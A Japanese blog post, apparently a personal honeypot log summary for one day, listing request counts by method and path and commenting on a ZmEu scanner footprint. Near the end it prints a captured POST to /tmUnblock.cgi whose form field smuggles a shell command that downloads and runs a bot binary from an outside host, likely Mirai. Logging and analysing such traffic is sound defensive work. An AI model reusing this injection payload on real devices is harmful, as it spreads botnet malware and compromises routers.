honeypotの簡易解析10日目

遂に10日達成しました!ルーチンワークはスクリプト書いて、logもメールで受信できるため、無理なく続けれそうな気がしてます。

この10日間はメール発報スクリプトのメンテに時間割かれていたので、マルウェア解析等、できれば良いなと思います

上記を書いた瞬間に正規表現でのパス取得におもらしに気付く・・はぁ

スクリプト修正しました。もう、、大丈夫なはず!!

2019-04-10のアクセス数は346件でした。

■送信元IPアドレスの数は 58件です。

■メソッドの一覧と件数は以下です。

method総数 – method
CONNECT1
GET342
HEAD2
POST1
合計 結果346

■アクセスパス一覧と件数は以下です。

pathmethod総数 – method
/ GET49
/favicon.icoGET3
/manager/htmlGET284
/phpMyAdmin/GET2
/robots.txtHEAD1
/tmUnblock.cgiPOST1
/w00tw00t.at.blackhats.romanian.anti-sec:)GET1
http://112.124.42.80:63435/HEAD1
http://www.baidu.com/GET1
www.baidu.com:443CONNECT1
(空白)GET2

気になるlog

-=-=309件目のlog=-=-

[2019-04-10 13:42:40+0900] 139.59.42.75 133.167.108.152:80 "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 200 False  GET/w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1<br> Accept: <em>/</em><br> Accept-Language: en-us<br> Accept-Encoding: gzip, deflate<br> User-Agent: ZmEu<br> Host: 133.167.108.152<br> Connection: Close

気になったのはこの文字列”/w00tw00t.at.blackhats.romanian.anti-sec:)”

攻撃者が意図的に残す、footprintだとの事!

w00tw00t・・・とあるHackerが使っていたスラング?で”イェーイ”的な使い方?

romanian・・・ルーマニア人

User-AgentのZmEuは脆弱性スキャナーだそうで、phpMyAdminやSSHのブルートフォースの機能をもっているそう。ルーマニアで開発されたとのこと。

-=-=325件目のlog=-=-

[2019-04-10 18:13:23+0900] 24.192.52.230 192.168.0.14:80 "POST /tmUnblock.cgi HTTP/1.1" 200 False
POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl.bot%3B+wget+http%3A%2F%2Flove.thotiana.live%2Fbins%2Fmpsl.bot%3B+chmod+777+mpsl.bot%3B+.%2Fmpsl.bot+s1%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

マルウェアのダウンロード。おそらくmirai。